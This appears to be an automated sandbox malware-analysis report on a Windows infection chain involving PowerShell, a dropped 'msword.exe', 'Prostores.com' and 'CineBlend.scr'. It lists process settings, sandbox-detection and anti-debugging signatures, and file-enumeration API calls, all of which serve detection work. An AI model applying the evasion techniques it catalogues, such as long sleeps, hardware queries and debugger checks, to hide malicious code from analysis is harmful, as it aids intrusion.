Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_33-104786
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3884Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4611Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6284Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5532
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4204
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrAPI coverage: 4.1 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep count: 3884 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep count: 4611 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800Thread sleep time: -9223372036854770s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7700Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004Thread sleep count: 6284 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072Thread sleep time: -12912720851596678s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004Thread sleep count: 101 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1624Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7668Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7648Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2016Thread sleep count: 5532 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2016Thread sleep count: 4204 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2188Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com TID: 4660Thread sleep time: -32000s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_00406301 FindFirstFileW,FindClose,15_2_00406301
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,15_2_00406CC7
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BBA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,33_2_00BBA087
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BBA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,33_2_00BBA1E2
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BAE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,33_2_00BAE472
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BBA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,33_2_00BBA570
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BB66DC FindFirstFileW,FindNextFileW,FindClose,33_2_00BB66DC
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B7C622 FindFirstFileExW,33_2_00B7C622
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BB73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,33_2_00BB73D4
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BB7333 FindFirstFileW,FindClose,33_2_00BB7333
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BAD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,33_2_00BAD921
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,33_2_00BADC54
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B45FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,33_2_00B45FC8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\msword\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\mswordJump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: svchost.exe, 00000007.00000002.2572815474.000001AA0302B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
Source: svchost.exe, 00000007.00000002.2574598671.000001AA08458000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BBF4FF BlockInput,33_2_00BBF4FF
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B4338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,33_2_00B4338B
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,15_2_00406328
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B65058 mov eax, dword ptr fs:[00000030h]33_2_00B65058
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00BA20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,33_2_00BA20AA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B72992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_00B72992
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scrCode function: 33_2_00B60BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_00B60BAF
